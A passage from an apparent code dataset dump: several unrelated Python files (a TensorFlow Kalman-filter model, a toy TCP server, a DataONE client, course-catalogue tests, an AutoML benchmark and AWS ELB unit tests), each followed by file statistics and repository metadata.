observation_mat = tf.constant(np.float32(np.eye(self.D)))
observation_cov = tf.zeros((self.D, self.D), dtype=tf.float32)
super(LinearGaussian, self).__init__(prior_mean=prior_mean, prior_cov=prior_cov,
transition_mat=transition_mat,
transition_mean=transition_mean,
transition_cov=transition_cov,
observation_mat=observation_mat,
observation_mean=observation_mean,
observation_cov=observation_cov,
shape=shape, **kwargs)
def inputs(self):
return {"prior_mean": unconstrained, "prior_cov": psd_matrix,
"transition_mat": unconstrained, "transition_mean": unconstrained, "transition_cov": psd_matrix,
"observation_mat": unconstrained, "observation_mean": unconstrained, "observation_cov": psd_matrix}
def _compute_shape(self, prior_mean_shape, prior_cov_shape,
transition_mat_shape, transition_mean_shape, transition_cov_shape,
observation_mat_shape=None, observation_mean_shape=None, observation_cov_shape=None):
D1, = prior_mean_shape
D2, D3 = prior_cov_shape
D4, D5 = transition_mat_shape
D6, = transition_mean_shape
D7, D8 = transition_cov_shape
assert(D1 == D2 == D3 == D4 == D5 == D6 == D7 == D8)
if observation_mat_shape is not None:
K1, D9 = observation_mat_shape
K2, = observation_mean_shape
K3, K4 = observation_cov_shape
assert(D9 == D1)
assert(K1 == K2 == K3 == K4)
else:
K1 = D1
return (self.T, K1)
def _sample_and_entropy(self, **input_samples):
sampled = self._sample(**input_samples)
entropy = -self._logp(result=sampled, **input_samples)
return sampled, entropy
def _sample(self, prior_mean, prior_cov,
transition_mat, transition_mean, transition_cov,
observation_mat=None, observation_mean=None, observation_cov=None):
transition_mean = tf.reshape(transition_mean, shape=(self.D, 1))
transition_eps = tf.random_normal(shape=(self.T, self.D))
transition_epses = [tf.reshape(n, shape=(self.D, 1)) for n in tf.unpack(transition_eps)]
prior_mean = tf.reshape(prior_mean, shape=(self.D, 1))
prior_cov_L = tf.cholesky(prior_cov)
state = prior_mean + tf.matmul(prior_cov_L, transition_epses[0])
transition_cov_L = tf.cholesky(transition_cov)
if not self._flag_no_obs:
observation_cov_L = tf.cholesky(observation_cov)
obs_eps = tf.random_normal(shape=(self.T, self.K))
obs_epses = [tf.reshape(n, shape=(self.K, 1)) for n in tf.unpack(obs_eps)]
observation_mean = tf.reshape(observation_mean, shape=(self.K, 1))
output = []
hidden = []
for t in range(self.T):
if not self._flag_no_obs:
pred_obs = tf.matmul(observation_mat, state) + observation_mean
output.append(pred_obs + tf.matmul(observation_cov_L, obs_epses[t]))
else:
output.append(state)
hidden.append(state)
if t < self.T-1:
state_noise = transition_mean + tf.matmul(transition_cov_L, transition_epses[t+1])
state = tf.matmul(transition_mat, state) + state_noise
self._sampled_hidden = hidden
return tf.pack(tf.squeeze(output))
def _logp(self, result, prior_mean, prior_cov,
transition_mat, transition_mean, transition_cov,
observation_mat=None, observation_mean=None, observation_cov=None):
# define the Kalman filtering calculation within the TF graph
if not self._flag_no_obs:
observation_mean = tf.reshape(observation_mean, (self.K, 1))
transition_mean = tf.reshape(transition_mean, (self.D, 1))
pred_mean = tf.reshape(prior_mean, (self.D, 1))
pred_cov = prior_cov
filtered_means = []
filtered_covs = []
step_logps = []
observations = tf.unpack(result)
for t in range(self.T):
obs_t = tf.reshape(observations[t], (self.K, 1))
if not self._flag_no_obs:
tmp = tf.matmul(observation_mat, pred_cov)
S = tf.matmul(tmp, tf.transpose(observation_mat)) + observation_cov
# TODO optimize this to not use an explicit matrix inverse
#Sinv = tf.matrix_inverse(S)
#gain = tf.matmul(pred_cov, tf.matmul(tf.transpose(observation_mat), Sinv))
# todo worth implementing cholsolve explicitly?
gain = tf.matmul(pred_cov, tf.transpose(tf.matrix_solve(S, observation_mat)))
y = obs_t - tf.matmul(observation_mat, pred_mean) - observation_mean
updated_mean = pred_mean + tf.matmul(gain, y)
updated_cov = pred_cov - tf.matmul(gain, tmp)
else:
updated_mean = obs_t
updated_cov = tf.zeros_like(pred_cov)
S = pred_cov
y = obs_t - pred_mean
step_logp = util.dists.multivariate_gaussian_log_density(y, 0, S)
filtered_means.append(updated_mean)
filtered_covs.append(updated_cov)
step_logps.append(step_logp)
if t < self.T-1:
pred_mean = tf.matmul(transition_mat, updated_mean) + transition_mean
pred_cov = tf.matmul(transition_mat, tf.matmul(updated_cov, tf.transpose(transition_mat))) + transition_cov
self.filtered_means = filtered_means
self.filtered_covs = filtered_covs
self.step_logps = tf.pack(step_logps)
logp = tf.reduce_sum(self.step_logps)
return logp
class LinearGaussianChainCRF(ConditionalDistribution):
# TODO this has not been updated from the old-style QDistribution
# so is currently totally broken
def __init__(self, shape,
transition_matrices,
step_noise_means,
step_noise_covs,
unary_means,
unary_variances, **kwargs):
super(LinearGaussianChainCRF, self).__init__(transition_matrices=transition_matrices, step_noise_means=step_noise_means, step_noise_covs=step_noise_covs, unary_means=unary_means, unary_variances=unary_variances, shape=shape, **kwargs)
def inputs(self):
return {"transition_matrices": unconstrained, "step_noise_means": unconstrained, "step_noise_covs": psd_diagonal, "unary_means": None, "unary_variances": None}
def _sample_and_entropy(self, transition_matrices,
step_noise_means,
step_noise_covs,
unary_means,
unary_variances):
T, d = self.shape
upwards_means = tf.unpack(unary_means)
upwards_vars = tf.unpack(unary_variances)
unary_factors = [MVGaussianMeanCov(mean, tf.diag(vs)) for (mean, vs) in zip(upwards_means, upwards_vars)]
# transition_matrices is either a d x d matrix, or a T x d x d tensor
if len(transition_matrices.get_shape()) == 2:
transition_matrices = [transition_matrices for i in range(T)]
# step noise mean is either a (d,)-vector or a T x d matrix
if len(step_noise_means.get_shape()) == 1:
step_noise_means = [step_noise_means for i in range(T)]
# step noise cov is either a d x d matrix or a T x d x d tensor
if len(step_noise_covs.get_shape()) == 2:
step_noise_covs = [step_noise_covs for i in range(T)]
step_noise_factors = [MVGaussianMeanCov(step_noise_means[t], step_noise_covs[t]) for t in range(T)]
back_filtered, logZ = self._pass_messages_backwards(transition_matrices,
step_noise_factors,
unary_factors)
self._back_filtered = back_filtered
self._logZ = logZ
eps = tf.random_normal(shape=self.shape)
sample, entropy = self._sample_forward(back_filtered, transition_matrices,
step_noise_factors, eps)
return sample, entropy
def _entropy(self):
raise Exception("can't compute entropy without a sample...")
def _sample(self):
raise Exception("shouldn't try to sample a chainCRF without entropy...")
def _pass_messages_backwards(self, transition_matrices, step_noise_factors, unary_factors):
messages = []
T, d = self.shape
back_filtered = unary_factors[T-1]
messages.append(back_filtered)
logZ = 0.0
for t in np.arange(T-1)[::-1]:
back_filtered_pred = reverse_message(back_filtered,
transition_matrices[t],
step_noise_factors[t])
logZ += back_filtered_pred.multiply_density_logZ(unary_factors[t])
back_filtered = back_filtered_pred.multiply_density(unary_factors[t])
messages.append(back_filtered)
messages = messages[::-1]
return messages, logZ
def _sample_forward(self, back_filtered, transition_matrices,
step_noise_factors, eps):
samples = []
T, d = self.shape
epses = tf.unpack(eps)
sampling_dist = back_filtered[0]
z_i = sampling_dist.sample(epses[0])
samples.append(z_i)
sampling_dists = [sampling_dist]
entropies = [sampling_dist.entropy()]
for t in np.arange(1, T):
pred_mean = tf.matmul(transition_matrices[t-1], z_i)
noise = step_noise_factors[t-1]
incoming = MVGaussianMeanCov(noise.mean() + pred_mean, noise.cov())
sampling_dist = back_filtered[t].multiply_density(incoming)
sampling_dists.append(sampling_dist)
z_i = sampling_dist.sample(epses[t])
entropies.append(sampling_dist.entropy())
samples.append(z_i)
self.sampling_dists = sampling_dists
self.entropies = entropies
entropy = tf.reduce_sum(tf.pack(entropies))
sample = tf.reshape(tf.squeeze(tf.pack(samples)), self.shape)
return sample, entropy
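

# --- Reference sketch (not part of elbow; a minimal NumPy version of the
# Kalman-filter log-density recursion that LinearGaussian._logp builds in the
# TF graph, handy for sanity-checking small examples). The function name and
# signature below are local to this sketch, not elbow API.
def _reference_kalman_logp(ys, m0, P0, A, b, Q, H, c, R):
    """log p(y_1:T) under x_t = A x_{t-1} + b + N(0, Q), y_t = H x_t + c + N(0, R)."""
    pred_mean, pred_cov, logp = m0, P0, 0.0
    for y in ys:
        # innovation and its covariance
        S = H.dot(pred_cov).dot(H.T) + R
        resid = y - (H.dot(pred_mean) + c)
        logp += scipy.stats.multivariate_normal.logpdf(resid, mean=np.zeros(len(resid)), cov=S)
        # Kalman gain and posterior update (explicit inverse kept for clarity;
        # see the solve-based TODO in _logp above for the faster route)
        K = pred_cov.dot(H.T).dot(np.linalg.inv(S))
        post_mean = pred_mean + K.dot(resid)
        post_cov = pred_cov - K.dot(H).dot(pred_cov)
        # one-step-ahead prediction for the next observation
        pred_mean = A.dot(post_mean) + b
        pred_cov = A.dot(post_cov).dot(A.T) + Q
    return logp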
| 42.223776 | 242 | 0.602103 | 1,423 | 12,076 | 4.829937 | 0.154603 | 0.035356 | 0.018333 | 0.027499 | 0.296668 | 0.223629 | 0.150153 | 0.103012 | 0.079732 | 0.079732 | 0 | 0.007848 | 0.314177 | 12,076 | 285 | 243 | 42.37193 | 0.822024 | 0.074611 | 0 | 0.166667 | 0 | 0 | 0.024917 | 0 | 0 | 0 | 0 | 0.003509 | 0.015152 | 1 | 0.065657 | false | 0.010101 | 0.035354 | 0.010101 | 0.156566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd7f195a00e7374763e0bd2f25ffaede27cf631 | 300 | py | Python | src/docs/net/ip/tcp_server.py | fujiawei-dev/protocols-notes | 4f5b2dd6f7b5a7f2d1260312972898be0f123ff5 | [
"MIT"
] | null | null | null | src/docs/net/ip/tcp_server.py | fujiawei-dev/protocols-notes | 4f5b2dd6f7b5a7f2d1260312972898be0f123ff5 | [
"MIT"
] | null | null | null | src/docs/net/ip/tcp_server.py | fujiawei-dev/protocols-notes | 4f5b2dd6f7b5a7f2d1260312972898be0f123ff5 | [
"MIT"
] | null | null | null | """
Date: 2022.04.03 16:48:45
LastEditors: Rustle Karl
LastEditTime: 2022.04.03 20:21:38
"""
import socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("0.0.0.0", 9090))
server.listen(50000)
while True:
client, client_address = server.accept()
    client.send(b"OK")  # socket.send() requires bytes, not str, in Python 3
    client.close()
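
# --- Companion client sketch (illustrative, not part of this file). The
# loopback address mirrors the bind above and is an assumption for local
# testing.
#
# import socket
#
# client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# client.connect(("127.0.0.1", 9090))
# print(client.recv(1024))  # expected: b"OK"
# client.close()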
| 18.75 | 58 | 0.71 | 48 | 300 | 4.375 | 0.6875 | 0.028571 | 0.07619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156489 | 0.126667 | 300 | 15 | 59 | 20 | 0.645038 | 0.28 | 0 | 0 | 0 | 0 | 0.043269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cdfdb149027f845e15333f523f0c024a1f4b256 | 6,913 | py | Python | lib_client/src/d1_client/d1client.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 15 | 2016-10-28T13:56:52.000Z | 2022-01-31T19:07:49.000Z | lib_client/src/d1_client/d1client.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 56 | 2017-03-16T03:52:32.000Z | 2022-03-12T01:05:28.000Z | lib_client/src/d1_client/d1client.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 11 | 2016-05-31T16:22:02.000Z | 2020-10-05T14:37:10.000Z | #!/usr/bin/env python
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import logging
import pathlib
import d1_common.const
import d1_common.object_format_cache
import d1_common.system_metadata
import d1_common.type_conversions
import d1_common.types.exceptions
import d1_client.cnclient
import d1_client.cnclient_2_0
import d1_client.mnclient
import d1_client.mnclient_1_2
import d1_client.mnclient_2_0
BASE_URL_TO_NODE_ID_DICT = {}
class DataONEClient(
d1_client.mnclient_2_0.MemberNodeClient_2_0,
d1_client.cnclient_2_0.CoordinatingNodeClient_2_0,
):
"""Perform high level operations against the DataONE infrastructure.
The other Client classes are specific to CN or MN and to architecture version. This
class provides a more abstract interface that can be used for interacting with any
DataONE node regardless of type and version.
"""
def __init__(self, *args, **kwargs):
"""See baseclient.DataONEBaseClient for args."""
super().__init__(*args, **kwargs)
self._log = logging.getLogger(__name__)
self.object_format_cache = d1_common.object_format_cache.ObjectFormatListCache()
def create_sciobj(
self, pid, format_id, sciobj, vendor_specific_dict=None, **sysmeta_dict
):
"""Create a Science Object on a Memeber Node.
Wrapper for MNStorage.create() that includes semi-automatic generation of System
Metadata.
Args:
pid: str
Persistent Identifier.
format_id: str
formatId of the Science Object.
            sciobj: str, bytes or file-like stream
                str: Path to a file containing the object bytes
                bytes: Raw object bytes
                file-like stream: Open binary stream of the object bytes
vendor_specific_dict: dict
Pass additional, vendor specific parameters.
**sysmeta_dict: dict
Parameters to customize the System Metadata.
See also:
d1_common.system_metadata.generate_system_metadata_pyxb()
"""
sciobj_stream = self._resolve_to_stream(sciobj)
return self.create(
pid,
sciobj_stream,
self.create_sysmeta(pid, format_id, sciobj_stream, **sysmeta_dict),
vendor_specific_dict,
)
def _resolve_to_stream(self, sciobj):
"""
Args:
            sciobj: str, bytes, pathlib.Path or file-like stream
                str or pathlib.Path: Path to a file containing the object bytes
                bytes: Raw object bytes
                file-like stream: Open binary stream of the object bytes
Returns:
stream
"""
        if isinstance(sciobj, io.IOBase):
            return sciobj
        elif isinstance(sciobj, bytes):
            return io.BytesIO(sciobj)
        elif isinstance(sciobj, str):
            # the docstring advertises str paths, so open them as binary streams
            return open(sciobj, "rb")
        elif isinstance(sciobj, pathlib.Path):
            return sciobj.open("rb")
        else:
            raise ValueError("Unable to create stream")
def create_sysmeta(self, pid, format_id, sciobj_stream, **sysmeta_dict):
if not self.object_format_cache.is_valid_format_id(format_id):
raise d1_common.types.exceptions.InvalidSystemMetadata(
0, "Unknown formatId: {}".format(format_id)
)
primary_str, equivalent_set = self.auth_subj_tup
node_id = self.get_node_id()
return d1_common.system_metadata.generate_system_metadata_pyxb(
pid,
format_id,
sciobj_stream,
primary_str,
primary_str,
node_id,
**sysmeta_dict
)
def get_node_id(self):
if self.base_url not in BASE_URL_TO_NODE_ID_DICT:
BASE_URL_TO_NODE_ID_DICT[
self.base_url
] = self.getCapabilities().identifier.value()
return BASE_URL_TO_NODE_ID_DICT[self.base_url]
def get_api_major_by_base_url(
base_url=d1_common.const.URL_DATAONE_ROOT, *client_arg_list, **client_arg_dict
):
"""Read the Node document from a node and return an int containing the latest D1 API
version supported by the node.
The Node document can always be reached through the v1 API and will list services
for v1 and any later APIs versions supported by the node.
"""
api_major = 0
client = d1_client.mnclient.MemberNodeClient(
base_url, *client_arg_list, **client_arg_dict
)
node_pyxb = client.getCapabilities()
for service_pyxb in node_pyxb.services.service:
if service_pyxb.available:
api_major = max(api_major, int(service_pyxb.version[-1]))
return api_major
def get_client_type(d1_client_obj):
if isinstance(d1_client_obj, d1_client.mnclient.MemberNodeClient):
return "mn"
elif isinstance(d1_client_obj, d1_client.cnclient.CoordinatingNodeClient):
return "cn"
else:
assert False, "Unable to determine d1_client type"
def get_version_tag_by_d1_client(d1_client_obj):
api_major, api_minor = d1_client_obj.api_version_tup
return d1_common.type_conversions.get_version_tag(api_major)
def get_mn_client_class_by_version_tag(api_major):
api_major = str(api_major)
    if api_major in ("v1", "1"):
        return d1_client.mnclient_1_2.MemberNodeClient_1_2
    elif api_major in ("v2", "2"):
return d1_client.mnclient_2_0.MemberNodeClient_2_0
else:
raise ValueError("Unknown DataONE API version tag: {}".format(api_major))
def get_client_class(api_major=2, node_type="mn"):
"""Get a DataONEClient based class that can be used for creating clients for use
with a node of the given ``node_type`` that supports the DataONE API with the given
``api_major``.
Args:
api_major: str or int
'v1', '1' or 1
'v2', '2' or 2
node_type: str
mn: Member Node
cn: Coordinating Node
Returns:
DataONEClient based class
"""
    if node_type.lower() == "mn":
        return get_mn_client_class_by_version_tag(api_major)
    elif node_type.lower() == "cn":
return d1_client.cnclient_2_0.CoordinatingNodeClient_2_0
else:
raise ValueError("Unknown node type: {}".format(node_type))
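

# --- Usage sketch (illustrative, not a supported recipe). It only combines
# the helpers defined above; pointing at the public DataONE root is an
# example choice.
#
# api_major = get_api_major_by_base_url(d1_common.const.URL_DATAONE_ROOT)
# client_cls = get_client_class(api_major=api_major, node_type="cn")
# client = client_cls(d1_common.const.URL_DATAONE_ROOT)
# print(get_client_type(client), get_version_tag_by_d1_client(client))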
| 33.076555 | 88 | 0.672356 | 924 | 6,913 | 4.778139 | 0.261905 | 0.03624 | 0.028992 | 0.011778 | 0.245074 | 0.19026 | 0.14496 | 0.129558 | 0.07248 | 0.042582 | 0 | 0.017127 | 0.256763 | 6,913 | 208 | 89 | 33.235577 | 0.842156 | 0.368581 | 0 | 0.13 | 0 | 0 | 0.037562 | 0 | 0 | 0 | 0 | 0 | 0.01 | 1 | 0.1 | false | 0 | 0.13 | 0 | 0.38 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce28045195119b03b6a70cb5dc288a624a6fad1 | 2,139 | py | Python | tests/unit/model/test_catalogo.py | douglasdcm/easy_db | 25a3b2fa51dda484cde7a6aa27f26e8ad6d0c827 | [
"MIT"
] | null | null | null | tests/unit/model/test_catalogo.py | douglasdcm/easy_db | 25a3b2fa51dda484cde7a6aa27f26e8ad6d0c827 | [
"MIT"
] | null | null | null | tests/unit/model/test_catalogo.py | douglasdcm/easy_db | 25a3b2fa51dda484cde7a6aa27f26e8ad6d0c827 | [
"MIT"
] | null | null | null | from src.model.catalogo_curso import CatalogoCurso
from src.model.curso import Curso
from src.model.materia import Materia
class TestCatalogo:
curso = "marcenaria"
materia_1 = "prego"
materia_2 = "parafuso"
materia_3 = "martelo"
def setup_method(self, method):
self.catalogo = CatalogoCurso()
self.catalogo.limpa_catalogo()
def teardown_method(self, method):
self.catalogo.limpa_catalogo()
def test_singleton_funciona(self):
catalogo_1 = CatalogoCurso()
catalogo_2 = CatalogoCurso()
assert catalogo_1 == catalogo_2
def test_limpa_catalogo(self):
self._cria_curso()
self._cria_curso(curso="pedreiro")
expected = list()
self.catalogo.limpa_catalogo()
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_remove_curso_do_catalogo(self):
curso_1 = self._cria_curso()
curso_2 = self._cria_curso(curso="pedreiro")
expected = [curso_1]
self.catalogo.remove_curso(curso_2)
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_catalogo_vazio_retorna_lista_vazia(self):
expected = list()
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_adiciona_dois_cursos_no_catalogo(self):
curso_1 = self._cria_curso()
curso_2 = self._cria_curso("pedreiro")
expected = [curso_1, curso_2]
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_adiciona_curso_no_catalogo(self):
curso_1 = self._cria_curso()
expected = [curso_1]
actual = self.catalogo.pega_cursos()
assert actual == expected
def _cria_curso(self, curso=curso,
materia_1=materia_1,
materia_2=materia_2,
materia_3=materia_3):
curso_1 = Curso(curso)
curso_1.atualiza_materias(Materia(materia_1))
curso_1.atualiza_materias(Materia(materia_2))
curso_1.atualiza_materias(Materia(materia_3))
return curso_1 | 31.925373 | 54 | 0.649836 | 251 | 2,139 | 5.203187 | 0.183267 | 0.101072 | 0.069678 | 0.084227 | 0.55513 | 0.457121 | 0.332312 | 0.332312 | 0.305513 | 0.266462 | 0 | 0.019658 | 0.26274 | 2,139 | 67 | 55 | 31.925373 | 0.808497 | 0 | 0 | 0.363636 | 0 | 0 | 0.025234 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 1 | 0.163636 | false | 0 | 0.054545 | 0 | 0.327273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce35431b33811cb36dbd79aae7d5f814ea244b0 | 2,149 | py | Python | compare_Tensorflow_Sckit_Learn/benchmark_classification.py | sinkingtitanic/mljar-examples | 1ea4e99f4751f20b90e22cb75e6a7424005722e5 | [
"Apache-2.0"
] | 43 | 2017-02-01T21:44:39.000Z | 2022-03-29T13:59:48.000Z | compare_Tensorflow_Sckit_Learn/benchmark_classification.py | sinkingtitanic/mljar-examples | 1ea4e99f4751f20b90e22cb75e6a7424005722e5 | [
"Apache-2.0"
] | 7 | 2017-02-22T09:11:05.000Z | 2021-09-02T09:10:48.000Z | compare_Tensorflow_Sckit_Learn/benchmark_classification.py | sinkingtitanic/mljar-examples | 1ea4e99f4751f20b90e22cb75e6a7424005722e5 | [
"Apache-2.0"
] | 23 | 2017-02-22T09:08:45.000Z | 2022-02-11T01:01:38.000Z | import os
import time
import json
import numpy as np
import pandas as pd
from supervised.automl import AutoML
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split
from pmlb import fetch_data, classification_dataset_names
try:
    results = json.load(open("results.json"))
except FileNotFoundError:
    results = []  # first run: no previous results file to resume from
for classification_dataset in classification_dataset_names:
X, y = fetch_data(classification_dataset, return_X_y=True)
if X.shape[0] < 1000:
continue
if classification_dataset in [r["dataset"] for r in results]:
continue
print(classification_dataset, X.shape, y[:5], np.unique(y))
train_X, test_X, train_y, test_y = train_test_split(
X, y, test_size=0.25, stratify=y, random_state=12
)
ml_task = "binary_classification"
if len(np.unique(y)) > 2:
ml_task = "multiclass_classification"
mlp = AutoML(
algorithms=["MLP"],
mode="Perform",
explain_level=0,
train_ensemble=False,
golden_features=False,
features_selection=False,
ml_task=ml_task,
)
nn = AutoML(
algorithms=["Neural Network"],
mode="Perform",
explain_level=0,
train_ensemble=False,
golden_features=False,
features_selection=False,
ml_task=ml_task,
)
mlp.fit(train_X, train_y)
mlp_time = np.round(time.time() - mlp._start_time, 2)
nn.fit(train_X, train_y)
nn_time = np.round(time.time() - nn._start_time, 2)
mlp_ll = log_loss(test_y, mlp.predict_proba(test_X))
nn_ll = log_loss(test_y, nn.predict_proba(test_X))
print(classification_dataset, X.shape, np.unique(y), mlp_ll, nn_ll)
results += [
{
"dataset": classification_dataset,
"nrows": X.shape[0],
"ncols": X.shape[1],
"n_classes": len(np.unique(y)),
"mlp_logloss": mlp_ll,
"nn_logloss": nn_ll,
"mlp_time": mlp_time,
"nn_time": nn_time,
}
]
with open("results.json", "w") as fout:
fout.write(json.dumps(results, indent=4))
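
# --- Post-hoc inspection sketch (illustrative, not part of the benchmark).
# It only uses keys written to results.json above:
#
# df = pd.DataFrame(json.load(open("results.json")))
# df["nn_wins"] = df["nn_logloss"] < df["mlp_logloss"]
# print(df[["dataset", "mlp_logloss", "nn_logloss", "nn_wins"]])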
| 28.653333 | 71 | 0.64309 | 294 | 2,149 | 4.442177 | 0.302721 | 0.128637 | 0.027565 | 0.038285 | 0.343032 | 0.220521 | 0.220521 | 0.220521 | 0.220521 | 0.145482 | 0 | 0.011743 | 0.247092 | 2,149 | 74 | 72 | 29.040541 | 0.795426 | 0 | 0 | 0.253968 | 0 | 0 | 0.079572 | 0.021405 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15873 | 0 | 0.15873 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce9127e33056554245ec6ea9cf2a6b7954bef54 | 8,576 | py | Python | test/unit/test_disco_elb.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | test/unit/test_disco_elb.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | 4 | 2016-03-22T17:04:04.000Z | 2016-03-23T18:03:45.000Z | test/unit/test_disco_elb.py | Angakkuit/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | """Tests of disco_elb"""
from unittest import TestCase
from mock import MagicMock
from moto import mock_elb
from disco_aws_automation import DiscoELB
TEST_ENV_NAME = 'unittestenv'
TEST_HOSTCLASS = 'mhcunit'
TEST_VPC_ID = 'vpc-56e10e3d' # the hard coded VPC Id that moto will always return
TEST_DOMAIN_NAME = 'test.example.com'
def _get_vpc_mock():
vpc_mock = MagicMock()
vpc_mock.environment_name = TEST_ENV_NAME
vpc_mock.vpc = MagicMock()
vpc_mock.vpc.id = TEST_VPC_ID
return vpc_mock
class DiscoELBTests(TestCase):
"""Test DiscoELB"""
def setUp(self):
self.disco_elb = DiscoELB(_get_vpc_mock(), route53=MagicMock(), acm=MagicMock(), iam=MagicMock())
self.disco_elb.acm.get_certificate_arn = MagicMock(return_value="arn:aws:acm::123:blah")
self.disco_elb.iam.get_certificate_arn = MagicMock(return_value="arn:aws:iam::123:blah")
def _create_elb(self, hostclass=None, public=False, tls=False,
idle_timeout=None, connection_draining_timeout=None,
sticky_app_cookie=None):
return self.disco_elb.get_or_create_elb(
hostclass=hostclass or TEST_HOSTCLASS,
security_groups=['sec-1'],
subnets=['sub-1'],
hosted_zone_name=TEST_DOMAIN_NAME,
health_check_url="/",
instance_protocol="HTTP",
instance_port=80,
elb_protocol="HTTPS" if tls else "HTTP",
elb_port=443 if tls else 80,
elb_public=public,
sticky_app_cookie=sticky_app_cookie,
idle_timeout=idle_timeout,
connection_draining_timeout=connection_draining_timeout)
@mock_elb
def test_get_certificate_arn_prefers_acm(self):
'''get_certificate_arn() prefers an ACM provided certificate'''
self.assertEqual(self.disco_elb.get_certificate_arn("dummy"), "arn:aws:acm::123:blah")
@mock_elb
def test_get_certificate_arn_fallback_to_iam(self):
'''get_certificate_arn() uses an IAM certificate if no ACM cert available'''
self.disco_elb.acm.get_certificate_arn = MagicMock(return_value=None)
self.assertEqual(self.disco_elb.get_certificate_arn("dummy"), "arn:aws:iam::123:blah")
@mock_elb
def test_get_cname(self):
'''Make sure get_cname returns what we expect'''
self.assertEqual(self.disco_elb.get_cname(TEST_HOSTCLASS, TEST_DOMAIN_NAME),
"mhcunit-unittestenv.test.example.com")
@mock_elb
def test_get_elb_with_create(self):
"""Test creating a ELB"""
self._create_elb()
self.assertEquals(
len(self.disco_elb.elb_client.describe_load_balancers()['LoadBalancerDescriptions']), 1)
@mock_elb
def test_get_elb_with_update(self):
"""Updating an ELB doesn't add create a new ELB"""
self._create_elb()
self._create_elb()
self.assertEquals(
len(self.disco_elb.elb_client.describe_load_balancers()['LoadBalancerDescriptions']), 1)
@mock_elb
def test_get_elb_internal(self):
"""Test creation an internal private ELB"""
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb()
self.disco_elb.elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTP',
'LoadBalancerPort': 80,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': 'arn:aws:acm::123:blah'
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'],
Scheme='internal')
@mock_elb
def test_get_elb_internal_no_tls(self):
"""Test creation an internal private ELB"""
self.disco_elb.acm.get_certificate_arn = MagicMock(return_value=None)
self.disco_elb.iam.get_certificate_arn = MagicMock(return_value=None)
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb()
elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTP',
'LoadBalancerPort': 80,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': ''
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'],
Scheme='internal')
@mock_elb
def test_get_elb_external(self):
"""Test creation a publically accessible ELB"""
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb(public=True)
